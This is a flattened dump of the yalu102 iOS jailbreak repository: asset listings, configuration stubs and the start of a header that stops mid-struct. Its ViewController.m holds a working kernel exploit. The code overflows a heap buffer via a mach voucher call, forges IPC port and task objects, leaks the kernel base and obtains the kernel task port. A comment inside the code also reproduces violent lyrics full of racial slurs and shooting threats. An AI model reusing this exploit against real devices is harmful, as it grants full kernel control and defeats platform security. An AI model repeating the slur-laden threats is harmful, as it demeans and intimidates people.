https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png -------------------------------------------------------------------------------- 
/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png 
-------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "size" : "20x20", 5 | "idiom" : "iphone", 6 | "filename" : "AppIcon40x40~ipad-2.png", 7 | "scale" : "2x" 8 | }, 9 | { 10 | "size" : "20x20", 11 | "idiom" : "iphone", 12 | "filename" : "AppIcon60x60.png", 13 | "scale" : "3x" 14 | }, 15 | { 16 | "size" : "29x29", 17 | "idiom" : "iphone", 18 | "filename" : "AppIcon40x40@2x~ipadsptl.png", 19 | "scale" : "2x" 20 | }, 21 | { 22 | "size" : "29x29", 23 | "idiom" : "iphone", 24 | "filename" : "AppIcon40x40@2x~ipadsptl3.png", 25 | "scale" : "3x" 26 | }, 27 | { 28 | "size" : "40x40", 29 | "idiom" : "iphone", 30 | "filename" : "AppIcon40x40@2x~ipad-1.png", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "size" : "40x40", 35 | "idiom" : "iphone", 36 | "filename" : "AppIcon40x40@3x~iphone.png", 37 | "scale" : "3x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | "filename" : "AppIcon60x60@2x.png", 43 | "scale" : "2x" 44 | }, 45 | { 46 | "size" : "60x60", 47 | "idiom" : "iphone", 48 | "filename" : "AppIcon60x60@3x.png", 49 | "scale" : "3x" 50 | }, 51 | { 52 | "size" : "20x20", 53 | "idiom" : "ipad", 54 | "filename" : "AppIcon40x40@2x~ipadnotif.png", 55 | "scale" : "1x" 56 | }, 57 | { 58 | "size" : "20x20", 59 | "idiom" : "ipad", 60 | "filename" : "AppIcon40x40~ipad-1.png", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "size" : "29x29", 65 | "idiom" : "ipad", 66 | "filename" : "AppIcon40x40@2x~ipadsptlsmal.png", 67 | "scale" : "1x" 68 | }, 69 | { 70 | "size" : "29x29", 71 | "idiom" : "ipad", 72 | "filename" : "AppIcon40x40@2x~ipadsptl-1.png", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : 
"40x40", 77 | "idiom" : "ipad", 78 | "filename" : "AppIcon40x40~ipad.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "40x40", 83 | "idiom" : "ipad", 84 | "filename" : "AppIcon40x40@2x~ipad.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "size" : "76x76", 89 | "idiom" : "ipad", 90 | "filename" : "AppIcon60x60~ipad.png", 91 | "scale" : "1x" 92 | }, 93 | { 94 | "size" : "76x76", 95 | "idiom" : "ipad", 96 | "filename" : "AppIcon60x60@2x~ipad.png", 97 | "scale" : "2x" 98 | }, 99 | { 100 | "size" : "83.5x83.5", 101 | "idiom" : "ipad", 102 | "filename" : "AppIcon60x60@2x~ipadpro.png", 103 | "scale" : "2x" 104 | } 105 | ], 106 | "info" : { 107 | "version" : 1, 108 | "author" : "xcode" 109 | } 110 | } -------------------------------------------------------------------------------- /SourceCode/yalu102/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /SourceCode/yalu102/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 33 | 39 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /SourceCode/yalu102/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | 
CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /SourceCode/yalu102/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | { 13 | IBOutlet UIButton* dope; 14 | } 15 | - (IBAction)yolo:(id)sender; 16 | 17 | @end 18 | 19 | -------------------------------------------------------------------------------- /SourceCode/yalu102/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 
7 | // 8 | 9 | #import "offsets.h" 10 | #import "ViewController.h" 11 | #import 12 | #import 13 | #import 14 | #undef __IPHONE_OS_VERSION_MIN_REQUIRED 15 | #import 16 | #include 17 | 18 | extern uint64_t procoff; 19 | 20 | typedef struct { 21 | mach_msg_header_t head; 22 | mach_msg_body_t msgh_body; 23 | mach_msg_ool_ports_descriptor_t desc[256]; 24 | char pad[4096]; 25 | } sprz; 26 | 27 | @interface ViewController () 28 | 29 | @end 30 | 31 | @implementation ViewController 32 | 33 | - (void)viewDidLoad { 34 | [super viewDidLoad]; 35 | init_offsets(); 36 | struct utsname u = { 0 }; 37 | uname(&u); 38 | 39 | 40 | if (strstr(u.version, "MarijuanARM")) { 41 | [dope setEnabled:NO]; 42 | [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 43 | } 44 | 45 | // Do any additional setup after loading the view, typically from a nib. 46 | } 47 | 48 | typedef natural_t not_natural_t; 49 | 50 | struct not_essers_ipc_object { 51 | not_natural_t io_bits; 52 | not_natural_t io_references; 53 | char io_lock_data[1337]; 54 | /* 55 | 56 | https://www.youtube.com/watch?v=ZADJ8S1qH3U 57 | 58 | 59 | [Intro] 60 | Lets get it 61 | Steve Drive 62 | R.I.P L'A Capone 63 | OTF 64 | These nigga's steady woofing like they want beef, want beef? 65 | You want smoke? You want smoke? Just tell me 66 | 67 | [Hook] 68 | These niggas steady woofing like they want beef, want beef?[You want smoke?] 69 | I can make that happen if you want beef, you want beef?[You want smoke?] 
70 | Catch you while you're capping with this semi, semi 71 | Put the semi-automatic to your kidney, kidney 72 | 73 | [Verse 1] 74 | Put the semi-automatic to your kidney, kidney 75 | I'm off the dope I got the pole you talking tough you getting smoked 76 | These nigga's steady woofing like they want beef, but I really know 77 | Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show 78 | I'm off Tu pack saying fuck Jojo[Fuck Jojo] 79 | Talking shit get your life took no joke 80 | I'm with my nigga's and my niggas ain't no joke 81 | And if you got that fucking bag then you getting poked 82 | And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] 83 | Me and Durk finna spaz, and I put that on the guys, it's homicides 84 | Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized 85 | And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] 86 | I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] 87 | I'm getting tree tree[Getting dope], getting top from a bitch named Kiki 88 | 89 | [Chorus] 90 | 91 | [Verse 2] 92 | And if you really want smoke[You want smoke little nigga?] 93 | I will give your ass smoke[Give your ass smoke little nigga?] 
94 | This Glock 9 bitch I tote, and I will put it to your throat 95 | I'm off this Tooka pack and no L'A, I'ma go crazy 96 | You supposed to be my nigga but actin' like a fan that’s crazy 97 | What the fuck wrong with these nigga's, they fugazi 98 | I made this song for the niggas, cause they crazy 99 | Separate me from them niggas[Separate Rondo] 100 | Pull up on your block, with the mops 101 | Then I hit the dip and put him up in case of attempts[Incase a nigga survive] 102 | But we don't make throws, we shoot like Pimp[We shoot to kill] 103 | I got 23[Two three] So i don't fucking speak[I don't speak] 104 | Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] 105 | Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch 106 | 107 | [Chorus] 108 | */ 109 | 110 | }; 111 | 112 | 113 | 114 | #define IO_BITS_ACTIVE 0x80000000 115 | #define IKOT_TASK 2 116 | #define IKOT_IOKIT_CONNECT 29 117 | #define IKOT_CLOCK 25 118 | 119 | char dt[128]; 120 | - (IBAction)yolo:(UIButton*)sender 121 | { 122 | /* 123 | 124 | we out here! 
125 | 126 | */ 127 | 128 | mach_port_t vch = 0; 129 | 130 | mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); 131 | data->content_size = 0; 132 | data->key=MACH_VOUCHER_ATTR_KEY_BANK; 133 | data->command=610; 134 | data->previous_voucher=MACH_PORT_NULL; 135 | 136 | kern_return_t lol = host_create_mach_voucher(mach_host_self(), data, sizeof(mach_voucher_attr_recipe_data_t), &vch); 137 | 138 | assert(lol==0 && vch!=0); 139 | 140 | 141 | unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 142 | unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); 143 | assert(fdata == odata + 0x4000); 144 | memset(odata, 0x42, 0x0); 145 | 146 | 147 | uint64_t rsz = 0x100; // alloc size; 148 | fdata -= rsz + 0x100; // overflow full chunk 149 | 150 | struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 151 | 152 | mlock(fakeport, 0x8000); 153 | 154 | fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; 155 | fakeport->io_lock_data[12] = 0x11; 156 | 157 | *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; 158 | 159 | 160 | mach_port_t* ports = calloc(800, sizeof(mach_port_t)); 161 | 162 | for (int i = 0; i < 800; i++) { 163 | mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); 164 | mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); 165 | } 166 | sprz msg1; 167 | 168 | memset(&msg1, 0, sizeof(sprz)); 169 | sprz msg2; 170 | 171 | memset(&msg2, 0, sizeof(sprz)); 172 | msg1.msgh_body.msgh_descriptor_count = 128; 173 | 174 | msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; 175 | msg1.head.msgh_local_port = MACH_PORT_NULL; 176 | msg1.head.msgh_size = sizeof(msg1)-2048; 177 | 178 | mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); 179 | for (int i = 0; i < 0x1000; i++) { 180 | buffer[i] = MACH_PORT_DEAD; 
181 | } 182 | 183 | for (int i = 0; i < 256; i++) { 184 | msg1.desc[i].address = buffer; 185 | msg1.desc[i].count = 0x100/8; 186 | msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 187 | msg1.desc[i].disposition = 19; 188 | } 189 | 190 | pthread_yield_np(); 191 | for (int i=1; i<300; i++) { 192 | msg1.head.msgh_remote_port = ports[i]; 193 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 194 | assert(kret==0); 195 | } 196 | 197 | pthread_yield_np(); 198 | for (int i=500; i<800; i++) { 199 | msg1.head.msgh_remote_port = ports[i]; 200 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 201 | assert(kret==0); 202 | } 203 | 204 | pthread_yield_np(); 205 | for (int i=300; i<500; i++) { 206 | msg1.head.msgh_remote_port = ports[i]; 207 | if (i%4 == 0) { 208 | msg1.msgh_body.msgh_descriptor_count = 1; 209 | } else { 210 | msg1.msgh_body.msgh_descriptor_count = 256; 211 | } 212 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 213 | assert(kret==0); 214 | } 215 | 216 | pthread_yield_np(); 217 | for (int i = 300; i<500; i+=4) { 218 | msg2.head.msgh_local_port = ports[i]; 219 | kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 220 | if(!(i < 380)) 221 | ports[i] = 0; 222 | assert(kret==0); 223 | } 224 | for (int i = 300; i<380; i+=4) { 225 | msg1.head.msgh_remote_port = ports[i]; 226 | msg1.msgh_body.msgh_descriptor_count = 1; 227 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 228 | assert(kret==0); 229 | } 230 | 231 | mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); 232 | mach_port_t foundport = 0; 233 | for (int i=1; i<500; i++) { 234 | if (ports[i]) { 235 | msg1.head.msgh_local_port = ports[i]; 236 | pthread_yield_np(); 237 | kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 238 | 
assert(kret==0); 239 | for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { 240 | mach_port_t* ptz = msg1.desc[k].address; 241 | for (int z = 0; z < 0x100/8; z++) { 242 | if (ptz[z] != MACH_PORT_DEAD) { 243 | if (ptz[z]) { 244 | foundport = ptz[z]; 245 | goto foundp; 246 | } 247 | 248 | } 249 | } 250 | } 251 | mach_msg_destroy(&msg1.head); 252 | mach_port_deallocate(mach_task_self(), ports[i]); 253 | ports[i] = 0; 254 | } 255 | } 256 | [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; 257 | return; 258 | 259 | foundp: 260 | NSLog(@"found corruption %x", foundport); 261 | 262 | uint64_t textbase = 0xfffffff007004000; 263 | 264 | for (int i = 0; i < 0x300; i++) { 265 | for (int k = 0; k < 0x40000; k+=8) { 266 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; 267 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 268 | 269 | kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); 270 | 271 | if (kret != KERN_FAILURE) { 272 | goto gotclock; 273 | } 274 | } 275 | } 276 | [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; 277 | return; 278 | 279 | gotclock:; 280 | uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); 281 | 282 | leaked_ptr &= ~0x3FFF; 283 | 284 | fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; 285 | fakeport->io_references = 0xff; 286 | char* faketask = ((char*)fakeport) + 0x1000; 287 | 288 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 289 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 290 | *(uint64_t*) (faketask + 0x10) = 0xee; 291 | 292 | while (1) { 293 | int32_t leaked = 0; 294 | *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; 295 | pid_for_task(foundport, &leaked); 296 | if (leaked == MH_MAGIC_64) { 297 | NSLog(@"found kernel text at %llx", leaked_ptr); 298 | break; 299 | } 300 | leaked_ptr -= 0x4000; 301 | } 302 | 303 | uint64_t kernel_base = leaked_ptr; 304 | 305 | uint64_t allproc = allproc_offset + kernel_base; 306 | 307 | uint64_t 
proc_ = allproc; 308 | 309 | uint64_t myproc = 0; 310 | uint64_t kernproc = 0; 311 | 312 | while (proc_) { 313 | uint64_t proc = 0; 314 | 315 | *(uint64_t*) (faketask + procoff) = proc_ - 0x10; 316 | pid_for_task(foundport, (int32_t*)&proc); 317 | *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; 318 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); 319 | 320 | int pd = 0; 321 | *(uint64_t*) (faketask + procoff) = proc; 322 | pid_for_task(foundport, &pd); 323 | 324 | if (pd == getpid()) { 325 | myproc = proc; 326 | } else if (pd == 0){ 327 | kernproc = proc; 328 | } 329 | proc_ = proc; 330 | } 331 | 332 | 333 | uint64_t kern_task = 0; 334 | *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; 335 | pid_for_task(foundport, (int32_t*)&kern_task); 336 | *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; 337 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); 338 | 339 | uint64_t itk_kern_sself = 0; 340 | *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; 341 | pid_for_task(foundport, (int32_t*)&itk_kern_sself); 342 | *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; 343 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); 344 | 345 | char* faketaskport = malloc(0x1000); 346 | char* ktaskdump = malloc(0x1000); 347 | 348 | for (int i = 0; i < 0x1000/4; i++) { 349 | *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; 350 | pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); 351 | } 352 | for (int i = 0; i < 0x1000/4; i++) { 353 | *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; 354 | pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); 355 | } 356 | 357 | memcpy(fakeport, faketaskport, 0x1000); 358 | memcpy(faketask, ktaskdump, 0x1000); 359 | 360 | mach_port_t pt = 0; 361 | 362 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 363 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 364 | 365 | *(uint64_t*)(((uint64_t)faketask) + 0x2b8) 
= itk_kern_sself; 366 | 367 | task_get_special_port(foundport, 4, &pt); // get tfp0 368 | NSLog(@"got tfp0 -> %x", pt); 369 | fakeport->io_bits = 0; 370 | 371 | extern uint64_t slide; 372 | slide = kernel_base - 0xFFFFFFF007004000; 373 | 374 | void exploit(void*, mach_port_t, uint64_t, uint64_t); 375 | exploit(sender, pt, kernel_base, allproc_offset); 376 | [dope setEnabled:NO]; 377 | [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 378 | 379 | } 380 | 381 | - (void)didReceiveMemoryWarning { 382 | [super didReceiveMemoryWarning]; 383 | // Dispose of any resources that can be recreated. 384 | } 385 | 386 | 387 | @end 388 | -------------------------------------------------------------------------------- /SourceCode/yalu102/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/bootstrap.tar -------------------------------------------------------------------------------- /SourceCode/yalu102/devicesupport.h: -------------------------------------------------------------------------------- 1 | #ifndef devicesupport_h 2 | #define devicesupport_h 3 | 4 | 5 | 6 | //0xFFFFFFF0075F6000+0x50 (0xfffffff006e4d620+0x4bc0) 7 | 8 | #define G(type) constget(type) 9 | #define S(type, val) constset(type,val) 10 | 11 | #define CS_VALID 0x0000001 /* dynamically valid */ 12 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 13 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 14 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 15 | 16 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 17 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 18 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 19 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 20 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 21 | 
#define CS_REQUIRE_LV 0x0002000 /* require library validation */ 22 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 23 | 24 | #define CS_ALLOWED_MACHO 0x00ffffe 25 | 26 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 27 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 28 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 29 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 30 | 31 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 32 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 33 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 34 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 35 | 36 | uint64_t constget(int idx); 37 | #import 38 | struct mac_policy_ops{ 39 | uint64_t mpo_audit_check_postselect; 40 | uint64_t mpo_audit_check_preselect; 41 | uint64_t mpo_bpfdesc_label_associate; 42 | uint64_t mpo_bpfdesc_label_destroy; 43 | uint64_t mpo_bpfdesc_label_init; 44 | uint64_t mpo_bpfdesc_check_receive; 45 | uint64_t mpo_cred_check_label_update_execve; 46 | uint64_t mpo_cred_check_label_update; 47 | uint64_t mpo_cred_check_visible; 48 | uint64_t mpo_cred_label_associate_fork; 49 | uint64_t mpo_cred_label_associate_kernel; 50 | uint64_t mpo_cred_label_associate; 51 | uint64_t mpo_cred_label_associate_user; 52 | uint64_t mpo_cred_label_destroy; 53 | uint64_t mpo_cred_label_externalize_audit; 54 | uint64_t mpo_cred_label_externalize; 55 | uint64_t mpo_cred_label_init; 56 | uint64_t mpo_cred_label_internalize; 57 | uint64_t mpo_cred_label_update_execve; 58 | uint64_t mpo_cred_label_update; 59 | uint64_t mpo_devfs_label_associate_device; 60 | uint64_t mpo_devfs_label_associate_directory; 61 | uint64_t mpo_devfs_label_copy; 62 | uint64_t mpo_devfs_label_destroy; 63 | uint64_t mpo_devfs_label_init; 64 | uint64_t 
mpo_devfs_label_update; 65 | uint64_t mpo_file_check_change_offset; 66 | uint64_t mpo_file_check_create; 67 | uint64_t mpo_file_check_dup; 68 | uint64_t mpo_file_check_fcntl; 69 | uint64_t mpo_file_check_get_offset; 70 | uint64_t mpo_file_check_get; 71 | uint64_t mpo_file_check_inherit; 72 | uint64_t mpo_file_check_ioctl; 73 | uint64_t mpo_file_check_lock; 74 | uint64_t mpo_file_check_mmap_downgrade; 75 | uint64_t mpo_file_check_mmap; 76 | uint64_t mpo_file_check_receive; 77 | uint64_t mpo_file_check_set; 78 | uint64_t mpo_file_label_init; 79 | uint64_t mpo_file_label_destroy; 80 | uint64_t mpo_file_label_associate; 81 | uint64_t mpo_ifnet_check_label_update; 82 | uint64_t mpo_ifnet_check_transmit; 83 | uint64_t mpo_ifnet_label_associate; 84 | uint64_t mpo_ifnet_label_copy; 85 | uint64_t mpo_ifnet_label_destroy; 86 | uint64_t mpo_ifnet_label_externalize; 87 | uint64_t mpo_ifnet_label_init; 88 | uint64_t mpo_ifnet_label_internalize; 89 | uint64_t mpo_ifnet_label_update; 90 | uint64_t mpo_ifnet_label_recycle; 91 | uint64_t mpo_inpcb_check_deliver; 92 | uint64_t mpo_inpcb_label_associate; 93 | uint64_t mpo_inpcb_label_destroy; 94 | uint64_t mpo_inpcb_label_init; 95 | uint64_t mpo_inpcb_label_recycle; 96 | uint64_t mpo_inpcb_label_update; 97 | uint64_t mpo_iokit_check_device; 98 | uint64_t mpo_ipq_label_associate; 99 | uint64_t mpo_ipq_label_compare; 100 